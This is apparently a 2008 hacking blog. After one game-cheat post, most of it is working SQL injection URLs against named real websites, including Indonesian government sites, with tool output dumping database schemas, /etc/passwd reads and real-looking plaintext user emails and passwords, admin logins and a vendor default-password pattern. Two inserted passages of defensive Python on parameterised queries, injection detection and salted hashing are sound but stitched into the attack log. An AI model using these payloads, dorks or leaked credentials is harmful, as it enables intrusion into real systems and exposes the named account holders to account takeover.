viperfx07 is here to blog about hacking, cracking, websites, applications, Android, and much more.

Wednesday, December 10, 2008

Pet Society - Hack Coins & Paw Points

6:41 PM Posted by viperfx07 6 comments
Tired of waiting for your paw points and coins to increase? Go watch the videos and rage!!!

Hack Coins Video

Note: the code is 840FFF85C12A0FF2
First of all, tick all the boxes that you are told to tick.
Second, sell or buy anything *before you start the first scan*,
then do exactly what is shown in the video.
Download Cheat Engine: here


Hack Paw Points Video

Note: you can hack both your paw points and your trophies... you can also do it with the Frisbee and the ball.

Monday, November 24, 2008

[SQLi] http://www.grouply.com

5:53 PM Posted by viperfx07 No comments
Intro: it's like the http://www.faniq.com case. I'm tired of being invited to join sites that are not even useful to me :) I decided to check, and again, voila, it's vulnerable :)

PoC: http://www.grouply.com/register.php?rem=[SQLi]
Demo: http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3/*

Database info:
[+] URL:http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,sqli,3/*
[+] Evasion Used: "/**/" "/*"
[+] 17:42:27
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: prod_collective
User: bg@web1.grouply.com
Version: 5.0.45-log

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,concat(user,0x3a,password),3/**/FROM/**/mysql.user/*

[+] Do we have Access to Load_File: Yes <-- w00t w00t
[!] http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,load_file(0x2f6574632f706173737764),3/*

[-] [17:42:30]
[-] Total URL Requests 3
[-] Done

[+] URL:http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,sqli,3/*
[+] Evasion Used: "/**/" "/*"
[+] 17:42:34
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: prod_collective
User: bg@web1.grouply.com
Version: 5.0.45-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 264

[0]mysql
[1]prod_collective
[2]prod_common
[3]prod_federated
[4]prod_postfix
[5]prod_stats
[6]prod_tmp
[7]prod_user0
[8]prod_user1
[9]prod_user10
[10]prod_user100
[11]prod_user101
[12]prod_user102
[13]prod_user103
[14]prod_user104
[15]prod_user105
[16]prod_user106
[17]prod_user107
[18]prod_user108
[19]prod_user109
[20]prod_user11
[21]prod_user110
[22]prod_user111
[23]prod_user112
[24]prod_user113
[25]prod_user114
[26]prod_user115
[27]prod_user116
[28]prod_user117
[29]prod_user118
[30]prod_user119
[31]prod_user12
[32]prod_user120
[33]prod_user121
[34]prod_user122
[35]prod_user123
[36]prod_user124
[37]prod_user125
[38]prod_user126
[39]prod_user127
[40]prod_user128
[41]prod_user129
[42]prod_user13
[43]prod_user130
[44]prod_user131
[45]prod_user132
[46]prod_user133
[47]prod_user134
[48]prod_user135
[49]prod_user136
[50]prod_user137
[51]prod_user138
[52]prod_user139
[53]prod_user14
[54]prod_user140
[55]prod_user141
[56]prod_user142
[57]prod_user143
[58]prod_user144
[59]prod_user145
[60]prod_user146
[61]prod_user147
[62]prod_user148
[63]prod_user149
[64]prod_user15
[65]prod_user150
[66]prod_user151
[67]prod_user152
[68]prod_user153
[69]prod_user154
[70]prod_user155
[71]prod_user156
[72]prod_user157
[73]prod_user158
[74]prod_user159
[75]prod_user16
[76]prod_user160
[77]prod_user161
[78]prod_user162
[79]prod_user163
[80]prod_user164
[81]prod_user165
[82]prod_user166
[83]prod_user167
[84]prod_user168
[85]prod_user169
[86]prod_user17
[87]prod_user170
[88]prod_user171
[89]prod_user172
[90]prod_user173
[91]prod_user174
[92]prod_user175
[93]prod_user176
[94]prod_user177
[95]prod_user178
[96]prod_user179
[97]prod_user18
[98]prod_user180
[99]prod_user181
[100]prod_user182
[101]prod_user183
[102]prod_user184
[103]prod_user185
[104]prod_user186
[105]prod_user187
[106]prod_user188
[107]prod_user189
[108]prod_user19
[109]prod_user190
[110]prod_user191
[111]prod_user192
[112]prod_user193
[113]prod_user194
[114]prod_user195
[115]prod_user196
[116]prod_user197
[117]prod_user198
[118]prod_user199
[119]prod_user2
[120]prod_user20
[121]prod_user200
[122]prod_user201
[123]prod_user202
[124]prod_user203
[125]prod_user204
[126]prod_user205
[127]prod_user206
[128]prod_user207
[129]prod_user208
[130]prod_user209
[131]prod_user21
[132]prod_user210
[133]prod_user211
[134]prod_user212
[135]prod_user213
[136]prod_user214
[137]prod_user215
[138]prod_user216
[139]prod_user217
[140]prod_user218
[141]prod_user219
[142]prod_user22
[143]prod_user220
[144]prod_user221
[145]prod_user222
[146]prod_user223
[147]prod_user224
[148]prod_user225
[149]prod_user226
[150]prod_user227
[151]prod_user228
[152]prod_user229
[153]prod_user23
[154]prod_user230
[155]prod_user231
[156]prod_user232
[157]prod_user233
[158]prod_user234
[159]prod_user235
[160]prod_user236
[161]prod_user237
[162]prod_user238
[163]prod_user239
[164]prod_user24
[165]prod_user240
[166]prod_user241
[167]prod_user242
[168]prod_user243
[169]prod_user244
[170]prod_user245
[171]prod_user246
[172]prod_user247
[173]prod_user248
[174]prod_user249
[175]prod_user25
[176]prod_user250
[177]prod_user251
[178]prod_user252
[179]prod_user253
[180]prod_user254
[181]prod_user255
[182]prod_user26
[183]prod_user27
[184]prod_user28
[185]prod_user29
[186]prod_user3
[187]prod_user30
[188]prod_user31
[189]prod_user32
[190]prod_user33
[191]prod_user34
[192]prod_user35
[193]prod_user36
[194]prod_user37
[195]prod_user38
[196]prod_user39
[197]prod_user4
[198]prod_user40
[199]prod_user41
[200]prod_user42
[201]prod_user43
[202]prod_user44
[203]prod_user45
[204]prod_user46
[205]prod_user47
[206]prod_user48
[207]prod_user49
[208]prod_user5
[209]prod_user50
[210]prod_user51
[211]prod_user52
[212]prod_user53
[213]prod_user54
[214]prod_user55
[215]prod_user56
[216]prod_user57
[217]prod_user58
[218]prod_user59
[219]prod_user6
[220]prod_user60
[221]prod_user61
[222]prod_user62
[223]prod_user63
[224]prod_user64
[225]prod_user65
[226]prod_user66
[227]prod_user67
[228]prod_user68
[229]prod_user69
[230]prod_user7
[231]prod_user70
[232]prod_user71
[233]prod_user72
[234]prod_user73
[235]prod_user74
[236]prod_user75
[237]prod_user76
[238]prod_user77
[239]prod_user78
[240]prod_user79
[241]prod_user8
[242]prod_user80
[243]prod_user81
[244]prod_user82
[245]prod_user83
[246]prod_user84
[247]prod_user85
[248]prod_user86
[249]prod_user87
[250]prod_user88
[251]prod_user89
[252]prod_user9
[253]prod_user90
[254]prod_user91
[255]prod_user92
[256]prod_user93
[257]prod_user94
[258]prod_user95
[259]prod_user96
[260]prod_user97
[261]prod_user98
[262]prod_user99
[263]test

[-] [17:47:11]
[-] Total URL Requests 266
[-] Done


[+] URL:http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,sqli,3/*
[+] Evasion Used: "/**/" "/*"
[+] 17:47:59
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: prod_collective
User: bg@web1.grouply.com
Version: 5.0.45-log
[+] Showing Tables & Columns from database "prod_collective"
[+] Number of Tables: 39

[Database]: prod_collective
[Table: Columns]
[0]g_accesscode: code,enabled,category,comment
[1]g_bookmark: row_id,user_id,message_id,group_id,bookmarked_flg,note,created,last_upd_tm
[2]g_digest_stats: user_id,updated,num_messages_displayed,proc_time_secs,num_groups,highlights_tm,new_msg_query_tm,total_digest_tm
[3]g_download_task_0: row_id,created,last_upd,host,logic_proc_num,group_id,group_name,u1_user_id,u1_username,u1_y_username,u1_y_password1,u1_captcha_tm,u2_user_id,u2_username,u2_y_username,u2_y_password1,u2_captcha_tm,c0_flg,c1_flg,c2_flg,c3_flg,c4_flg,c5_flg,c6_flg,c7_flg,c8_flg,c9_flg,c10_flg,c11_flg,c12_flg,c13_flg,c14_flg,c15_flg,status0,status1,status2,status3,status4,status5,status6,status7,status8,status9,status10,status11,status12,status13,status14,status15
[4]g_download_task_1: row_id,created,last_upd,host,logic_proc_num,group_id,group_name,u1_user_id,u1_username,u1_y_username,u1_y_password1,u1_captcha_tm,u2_user_id,u2_username,u2_y_username,u2_y_password1,u2_captcha_tm,c0_flg,c1_flg,c2_flg,c3_flg,c4_flg,c5_flg,c6_flg,c7_flg,c8_flg,c9_flg,c10_flg,c11_flg,c12_flg,c13_flg,c14_flg,c15_flg,status0,status1,status2,status3,status4,status5,status6,status7,status8,status9,status10,status11,status12,status13,status14,status15
[5]g_download_track: row_id,created,type,group_name,group_id,download_msg_count,status_nc,int_x1,int_x2,int_x3,int_x4,int_x5,char_x1,char_x2,char_x3,char_x4,char_x5
[6]g_downloadmsg_proc: row_id,created,start_tm,host,pid,type,group_name,username,comments
[7]g_email_to_author: row_id,created,recipient,recipient_email,recipient_id,subject,sender_id,template_code,msg_body
[8]g_gap: row_id,group_id,group_name,msg_num,last_upd_tm,priority_nc,detect_tm
[9]g_gap_20080630: row_id,group_id,group_name,msg_num,last_upd_tm,priority_nc,detect_tm
[10]g_gap_backup: row_id,group_id,group_name,msg_num,last_upd_tm,priority_nc,detect_tm
[11]g_gap_backup20080511: row_id,group_id,group_name,msg_num,last_upd_tm,priority_nc,detect_tm
[12]g_gap_backup20080611: row_id,group_id,group_name,msg_num,last_upd_tm,priority_nc,detect_tm
[13]g_gm_dedup: row_id,shard_num,gm_id
[14]g_group_auth: row_id,group_name,group_id,auth_code,auth_tm,lockout_upd_tm
[15]g_group_auth_track: row_id,created,group_auth_id,group_name,ip,desc_text
[16]g_group_c: row_id,name,state,msg_num_d,gap_checked_msg_num,lock_status,archived_resolved_flg,archived_msg_flg,msg_status_tm,lock_status_tm
[17]g_group_member_c: row_id,group_id,user_id,y_profile_flg,group_status_tm,group_status,email_fwd_flg,email_fwd_flg_tm,email,g_email_flg
[18]g_mail: row_id,created,mail_act_id,desc_text,comments,recipient_count,to_email,group_name,f_name,l_name,status,reminder_count,par_mail_id
[19]g_mail_act: row_id,created,user_id,template_id,act_code,user_email,group_count,register_code,mail_trackid,source_page,reminded_flg,ip,comments
[20]g_mail_response: row_id,created,ip,register_code,mail_track_id,action_nc
[21]g_mail_response_invalid: row_id,created,ip,register_code,mail_track_id,action_nc
[22]g_mail_template: row_id,created,last_upd,src_type_cd,custom_flg,status,subject,desc_text,tempting_text,comments,last_upd_by
[23]g_popular_group: row_id,group_id,group_name,rank
[24]g_rating: row_id,created,user_id,group_id,message_id,first_flg,rating,last_upd_tm
[25]g_refresh_q: row_id,created,user_id,host,process_id
[26]g_tag: row_id,created,user_id,group_id,message_id,tag,seq
[27]g_tip: row_id,tip_num,desc_text,created
[28]g_uauthor_obsolete: row_id,uname,status,status_tm,group_name,msg_num
[29]g_unarchive: row_id,created,group_name,group_id,req_tm,status,status_tm,start_tm,end_tm
[30]g_update: row_id,created,user_id,group_id,message_id,update_count,last_upd_tm
[31]g_user_c: row_id,group_sync_status,group_sync_status_tm,captcha_status,captcha_ip,captcha_status_tm,sync_req_tm,lock_status,lock_status_tm,y_password_status,y_password_status_tm,download_last_tm
[32]g_user_c2: row_id,created,ref_user_id
[33]g_user_c3: row_id,created,ref_user_id,login_tm
[34]g_user_delete: row_id,created,username,confirm_email,group_count,del_req_tm,status,status_tm
[35]g_user_stats: user_id,new_user_count,entry_count,new_user_count_7d,new_user_count_30d,new_user_count_all
[36]g_view: row_id,user_id,group_id,message_id,read_flg,view_count,created,last_upd_tm
[37]g_waitinglist: time,email
[38]g_webconn_proc: row_id,created,start_tm,host,pid,logic_proc_num,status,next_new_group_cycle,last_cycle,last_status,last_run_tm,last_duration,last_msg_count,scheduled_groups,finished_groups,ok_groups,noarchive_groups,overlimit_groups,invalidpass_groups,nonenglish_groups,triplenine_groups,captcha_groups,no_user_groups,server_error_groups,other_failed_groups,comments

[-] [17:55:42]
[-] Total URL Requests 393
[-] Done

Sunday, November 23, 2008

[SQLi] http://www.faniq.com

6:03 PM Posted by viperfx07 No comments
Intro: it was funny. I found this vulnerability when I was about to unsubscribe, and voila, it was vulnerable. The passwords are not encrypted, so there is a chance that we can access members' email accounts that use the same password they entered when they registered.

PoC : http://www.faniq.com/unsubscribe.php?invite_id=[SQLi]
Demo: http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+concat_ws(0x3a,user(),database(),version())--
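The `id=...+AND+1=2+UNION+SELECT+...` shape used in this post and in the other posts on this page works because the script pastes the query-string value straight into its SQL text. The Python/sqlite3 example below is added here for illustration and is not code from this blog or from any of the sites listed: it builds a constructed two-table database, shows the concatenated query that lets the payload return rows from a different table, shows the parameterised query that the same payload cannot influence, and adds a small normaliser that flags the `UNION ... SELECT` shape even behind the `/**/`, `+` and trailing `/*` evasions the dumps record under "Evasion Used". All table contents are made up, and `fetch_news_vulnerable`, `fetch_news_fixed`, `normalize_param` and `looks_like_sqli` are names chosen for this example.

```python
import re
import sqlite3
import urllib.parse
from typing import List, Tuple

Row = Tuple[object, ...]


def build_db() -> sqlite3.Connection:
    """Constructed sample schema: a public news table and a private users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?, ?)",
        [(35, "Regatta results", "Race 1 results are in."), (36, "New office", "We have moved.")],
    )
    # Constructed row; the plaintext password mirrors what the dumps on this page show.
    conn.execute("INSERT INTO users VALUES (?, ?, ?)", (1, "admin@example.invalid", "plaintext-constructed"))
    conn.commit()
    return conn


def fetch_news_vulnerable(conn: sqlite3.Connection, raw_id: str) -> List[Row]:
    """The news.php?id= anti-pattern: the request value is concatenated into the SQL text."""
    sql = "SELECT id, title, body FROM news WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def fetch_news_fixed(conn: sqlite3.Connection, raw_id: str) -> List[Row]:
    """Fixed form: validate the type the route expects, then bind the value as a parameter."""
    try:
        news_id = int(raw_id)
    except ValueError:
        return []  # not an integer id: nothing to look up, and nothing reaches the SQL parser
    return conn.execute("SELECT id, title, body FROM news WHERE id=?", (news_id,)).fetchall()


# Same shape as the payloads in these posts; the column count matches the news query.
PAYLOAD = "35 AND 1=2 UNION SELECT id, email, password FROM users--"


def normalize_param(value: str) -> str:
    """Undo the evasions the dumps list: '+' for space, /**/ between tokens, a trailing /* comment."""
    v = urllib.parse.unquote_plus(value)
    v = re.sub(r"/\*.*?\*/", " ", v)  # inline comments used as token separators
    v = re.sub(r"/\*.*$", " ", v)     # unterminated comment that swallows the rest of the query
    return re.sub(r"\s+", " ", v).strip().lower()


def looks_like_sqli(value: str) -> bool:
    """Detection heuristic for one query-string value: UNION...SELECT, or an AND/OR n=m clause."""
    v = normalize_param(value)
    if re.search(r"\bunion\b.*\bselect\b", v):
        return True
    return re.search(r"\b(and|or)\b\s*\d+\s*=\s*\d+", v) is not None


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", fetch_news_vulnerable(db, PAYLOAD))
    print("fixed:     ", fetch_news_fixed(db, PAYLOAD))
    print("flagged:   ", looks_like_sqli(PAYLOAD))
```

The type check in `fetch_news_fixed` is not what makes it safe; the bound parameter is. The cast simply turns a malformed request into an empty result instead of a database error, which is also the response an attacker cannot learn anything from. `looks_like_sqli` is a log-review heuristic, not a filter to put in front of the query: it catches the patterns in these dumps, but the only reliable fix is the parameterised form.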

Tools: schemafuzz.py v5.0
Admin page: http://www.faniq.com/admin/
Admin usr/pwd query:
- step 1 (get the member id with admin privilege): http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+concat_ws(0x3a,member_id,admin)+from+member_privs+where+admin=char(0x59)--

- step 2 (get email & password with member_id in step 1): http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+concat_ws(0x3a,member_id,email,password)+from+member+where+member_id=char(0x3134)--

Screenshot of admin page:


Database info:
[+] URL:http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+sqli--
[+] Evasion Used: "+" "--"
[+] 17:40:49
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: FANIQ
User: sport@10.10.11.135
Version: 5.0.45-log

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+concat(user,0x3a,password)+FROM+mysql.user--

[+] Do we have Access to Load_File: Yes <-- w00t w00t
[!] http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+load_file(0x2f6574632f706173737764)--

[-] [17:40:58]
[-] Total URL Requests 3
[-] Done

[+] URL:http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+sqli--
[+] Evasion Used: "+" "--"
[+] 17:41:14
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: FANIQ
User: sport@10.10.11.135
Version: 5.0.45-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 4

[0]FANIQ
[1]STATS
[2]mysql
[3]test

[-] [17:41:26]
[-] Total URL Requests 6
[-] Done

Saturday, November 22, 2008

[SQLi] http://www.broadsword.com.au

8:32 PM Posted by viperfx07 No comments
Tools: schemafuzz.py
Database info:
[+] URL: http://www.broadsword.com.au/news.php?id=35+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 20:20:43
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: broadsword
User: broadsword@localhost
Version: 4.1.22
[+] Dumping data from database "broadsword" Table "users"
[+] and Column(s) ['email', 'password']
[+] Number of Rows: 13

[0] sharon@broadsword.com.au:cameron:
[1] suzanne@broadsword.com.au:elise:
[2] drewp@broadsword.com.au:dr3w2006:
[3] ianf@broadsword.com.au:flett07:
[4] brain@broadsword.com.au:gus2208:
[5] gerald@broadsword.com.au:hockey1:
[6] castle@broadsword.com.au:col69:
[7] piers@broadsword.com.au:poohey:
[8] stuartk@broadsword.com.au:miranda1:
[9] dominicr@broadsword.com.au:zaq12wsx:
[10] pas.dimuccio@broadsword.com.au:sales2008:
[11] daniel.dixon@broadsword.com.au:sales2008:
[12] davidg@broadsword.com.au:sales:

[-] 20:20:46
[-] Total URL Requests 15
[-] Done

[SQLi] http://www.highperformancesailing.com.au

7:17 PM Posted by viperfx07 No comments
Tools = schemafuzz.py
Admin page = http://www.highperformancesailing.com.au/admin/
Admin usr/pwd = admin:admin

Database info:
[+] URL:http://www.highperformancesailing.com.au/news.php?id=31+AND+1=2+UNION+SELECT+0,sqli,2,3--
[+] Evasion Used: "+" "--"
[+] 19:12:04
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sailing_hps
User: sailing_sailing@localhost
Version: 5.0.51a-community

[Database]: sailing_hps
[Table: Columns]
[0]t_about: f_id,f_image,f_image2,f_title,f_content,f_content_small
[1]t_admin: f_id,f_username,f_password
[2]t_contact: f_id,f_address,f_phone,f_fax,f_email,f_post,f_map,f_content
[3]t_course: f_id,f_name,f_image,f_elements,f_content,f_content_small
[4]t_course_class2: f_id,f_coursid,f_name,f_image,f_content,f_elements
[5]t_course_class3: f_id,f_coursid,f_cours2id,f_name,f_image,f_content,f_elements
[6]t_link: f_id,f_name,f_type,f_image,f_url
[7]t_linktype: f_id,f_title
[8]t_news: f_id,f_title,f_content,f_addtime
[9]t_photo: f_id,f_title,f_image,f_content,f_addtime
[10]t_price: f_id,f_type,f_name,f_money
[11]t_price_type: f_id,f_title
[12]t_staff: f_id,f_name,f_job,f_intro,f_photo,f_addtime
[13]t_staff_match: f_id,f_staffid,f_year,f_type,f_match,f_city,f_country,f_place
[14]t_staff_title: f_id,f_staffid,f_certify,f_title
[15]t_testimonial: f_id,f_test,f_name,f_addtime

[-] [19:13:28]
[-] Total URL Requests 82
[-] Done


[+] URL:http://www.highperformancesailing.com.au/news.php?id=31+AND+1=2+UNION+SELECT+0,sqli,2,3--
[+] Evasion Used: "+" "--"
[+] 19:14:40
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sailing_hps
User: sailing_sailing@localhost
Version: 5.0.51a-community
[+] Dumping data from database "sailing_hps" Table "t_admin"
[+] Column(s) ['f_username', 'f_password']
[+] Number of Rows: 1

[0] admin:21232f297a57a5a743894a0e4a801fc3

[-] [19:14:43]
[-] Total URL Requests 3
[-] Done
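The dump above returns `admin:21232f297a57a5a743894a0e4a801fc3` for an account whose password, per the post, is `admin`; that value is the unsalted MD5 of the string `admin`, so any copy of the table reveals the password at a glance, and the faniq, broadsword and westcare posts on this page show the even weaker case of passwords stored in the clear. The Python example below is added here and is not code from the blog or from any of the sites discussed: it reproduces the legacy hash to show why it is recognisable, then stores and verifies the same password with salted PBKDF2-HMAC-SHA256 so that identical passwords produce different records, and ends with a small check that rejects username-as-password and denylisted defaults of the kind these posts list. The iteration count, the tiny denylist and the function names are assumptions made for this example.

```python
import hashlib
import hmac
import os
from typing import List, Optional

# Assumption for this example: a PBKDF2-HMAC-SHA256 work factor of the order current guidance recommends.
PBKDF2_ITERATIONS = 600_000
# Constructed stand-in for a real breached-password denylist.
DENYLISTED_PASSWORDS = {"admin", "password", "123456", "sales", "marketing"}


def legacy_md5(password: str) -> str:
    """Unsalted MD5, the scheme behind the t_admin hash above: same password, same hash, on every site."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None, iterations: int = PBKDF2_ITERATIONS) -> str:
    """Salted, iterated hash in a self-describing record: algorithm$iterations$salt$digest."""
    if salt is None:
        salt = os.urandom(16)  # fresh per-record salt: equal passwords no longer share a hash
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def verify_password(password: str, stored: str) -> bool:
    """Recompute from the stored salt and iteration count, then compare in constant time."""
    try:
        algo, iterations, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False  # not one of our records (for instance, a bare MD5 hex string)
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def credential_problems(username: str, password: str) -> List[str]:
    """Reject the patterns this page's dumps show: admin:admin, vendor defaults, short dictionary words."""
    problems = []
    if password.lower() == username.lower():
        problems.append("same_as_username")
    if password.lower() in DENYLISTED_PASSWORDS:
        problems.append("denylisted")
    if len(password) < 12:
        problems.append("too_short")
    return problems


if __name__ == "__main__":
    print(legacy_md5("admin"))  # identical on every site that stores unsalted MD5
    record = hash_password("admin")
    print(record)
    print(verify_password("admin", record), verify_password("admin1", record))
    print(credential_problems("admin", "admin"))
```

Storing the iteration count inside the record is what lets the work factor be raised later: old records still verify with the count they were written with, and can be re-hashed on the next successful login. The denylist check only matters if it runs at password set time, which is also the right place to refuse a vendor default such as the one the BigKid post below describes.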

[SQLi] http://www.westcare.com.au

6:52 PM Posted by viperfx07 No comments
Tools: schemafuzz.py
Admin page: http://www.westcare.com.au/admin/

[+] URL:http://www.westcare.com.au/news.php?id=26+AND+1=2+UNION+SELECT+sqli,1--
[+] Evasion Used: "+" "--"
[+] 18:49:07
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: westcare_cms
User: westcare_cmsuser@localhost
Version: 5.0.51a-community

[Database]: westcare_cms
[Table: Columns]
[0]code: id,class,description,value,sort_order,status,targetsite,parent_id
[1]main_category: id,description,value,site
[2]main_content: id,ver,author,title,category,description,body,displaydate,active,isdeleteable,iseditable,site
[3]menu: id,link,class,name,target,active,priority,root_id,parent_id,is_deletable,site
[4]news_category: id,description,value,site
[5]news_content: id,author,title,excerp,body,category,createddate,displaydate,expiresdate,updateddate,active,description,isdeleteable,site
[6]users: id,email,password,firstname,lastname,editorinterface,lastloggedin,active

[-] [18:49:44]
[-] Total URL Requests 63
[-] Done


[+] URL:http://www.westcare.com.au/news.php?id=26+AND+1=2+UNION+SELECT+sqli,1--
[+] Evasion Used: "+" "--"
[+] 18:50:25
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: westcare_cms
User: westcare_cmsuser@localhost
Version: 5.0.51a-community
[+] Dumping data from database "westcare_cms" Table "users"
[+] Column(s) ['email', 'password']
[+] Number of Rows: 2

[0] websupport@tsacorporation.com:ts@c0rp0r@ti0n:
[1] tanya.mcdonald@westcare.com.au:marketing:marketing:

[-] [18:50:26]
[-] Total URL Requests 4
[-] Done

[SQLi] BigKid Designs Websites

6:34 PM Posted by viperfx07 No comments
Dork = inurl:news.php?p=shw
PoC = http://www.site.com/news.php?p=shw&id=[SQLi]
Demo = http://www.warnemarketing.com.au/news.php?p=shw&id=47+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8--

Database structure:
[+] URL:http://www.warnemarketing.com.au/news.php?p=shw&id=47+AND+1=2+UNION+SELECT+0,1,2,unhex(hex(sqli)),4,5,6,7,8--
[+] Evasion Used: "+" "--"
[+] 18:08:49
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: warne_warne
User: warne_warne@localhost
Version: 5.0.51a-community-log

[Database]: warne_warne
[Table: Columns]
[0]admin: adm_id,adm_email,adm_fname,adm_lname,adm_login,adm_pass
[1]articles: a_id,a_date,a_title,a_cat,a_desc,a_ftype,a_file,a_pub
[2]articles_cats: a_c_id,a_c_name
[3]articles_types: a_t_id,a_t_name,a_t_type,a_t_icon
[4]kid_casestudy: cs_id,cs_date,cs_name,cs_problem,cs_solution,cs_final,cs_logo,cs_image,cs_pub
[5]news: n_id,n_date,n_time,n_title,n_news,n_name,n_image,n_comm,n_pub
[6]news_comm: n_c_id,n_c_idnum,n_c_name,n_c_email,n_c_comm,n_c_date,n_c_time,n_c_pub
[7]pages: pg_id,pg_name,pg_title,pg_description,pg_keywords,pg_revisit,pg_content
[8]testimonials: test_id,test_date,test_name,test_cname,test_pos,test_testimony,test_pub

[-] [18:10:40]
[-] Total URL Requests 62
[-] Done


Admin page = http://www.site.com/admin/
Admin login default = bigkid:emijane[N]
Note: Replace [N] with 1 - 9

Friday, November 21, 2008

[SQLi] http://www.imigrasi.co.id

5:25 PM Posted by viperfx07 No comments
PoC: http://www.imigrasi.go.id/index.php?go=pelayanan&pelIdnya=[SQLi]
Demo: http://www.imigrasi.go.id/index.php?go=pelayanan&pelIdnya=1+and+1=2+union+select+1,2,concat_ws(0x3a,usrID,usrPwd),4,5,6,7,8+from+users+limit+0,1--

Tools: RainbowCrack at irc.plain-text.info
Admin usr/pwd: admin:123qweasdzxc
Admin login page: http://www.imigrasi.co.id/login.php
Comment: mysql db can also be dumped.

Screenshot:



Sunday, November 16, 2008

[SQLi] http://www.dotaportal.com

10:14 AM Posted by viperfx07 No comments
PoC: http://www.dotaportal.com/index.php?act=items&id=[SQLi]

Demo: http://www.dotaportal.com/index.php?act=items&id=151'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7/*

Database info:
[+] URL:http://www.dotaportal.com/index.php?act=items&id=151'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,sqli,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 10:40:26
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: dotaportal
User: dotaportal@192.168.10.21
Version: 5.0.32-Debian_7etch6-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 2

[0]dotaportal
[1]meetyourmakers

Friday, November 14, 2008

[SQLi] http://www.gunungkidulkab.go.id

1:58 PM Posted by viperfx07 No comments
Tool: schemafuzz.py v5.0
Admin login loc: http://www.gunungkidulkab.go.id/gerbangkabupaten.php
Problem: can't login?

[+] URL:http://www.gunungkidulkab.go.id/home.php?mode=content&id=177+AND+1=2+UNION+SELECT+0,1,2,3,4,sqli,6,7,8,9,10,11,12,13--
[+] Evasion Used: "+" "--"
[+] 13:17:12
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: dbportalgunungkidul
User: gunungkidulkab.g@localhost
Version: 5.0.38-Ubuntu_0ubuntu1-log


[Database]: dbportalgunungkidul
[Table: Columns]
[0]detail_kategori: id,idk,name
[1]detail_kfoto: idk,idf,name,keterangan,nama_file,tanggal,klik
[2]kategori: id,name,keterangan
[3]petadetail_kategori: id,idk,name
[4]petadetail_kfoto: idk,idf,name,keterangan,nama_file,tanggal,klik
[5]petakategori: id,name,keterangan
[6]t_content: content_id,kategori_id,subkategori_id,content_judul,content_deskripsi,content_isi,content_adafoto,content_file,content_tglentri,content_baca,content_isaktif,login
[7]t_footer: footer_id,footer_judul,footer_isaktif
[8]t_group: group_id,group_nama
[9]t_jenislink: jenislink_id,jenislink_nama,jenislink_isaktif
[10]t_kategori: kategori_id,posisimenu_id,kategori_urut,kategori_nama,kategori_isaktif
[11]t_linksite: linksite_id,jenislink_id,linksite_nama,linksite_situs,linksite_gambar,linksite_isaktif
[12]t_marquee: marquee_id,marquee_isi,marquee_isaktif
[13]t_posisimenu: posisimenu_id,posisimenu_nama,posisimenu_isaktif
[14]t_setinghome: setinghome_id,posisimenu_id,setinghome_urut,setinghome_subjek,setinghome_versi,setinghome_keterangan,setinghome_fileprogram,setinghome_filetemplate,setinghome_isaktif
[15]t_slogan: slogan_id,slogan_nama,slogan_foto,slogan_isaktif
[16]t_smsbaner: smsbaner_id,smsbaner_nama,smsbaner_foto,smsbaner_isaktif
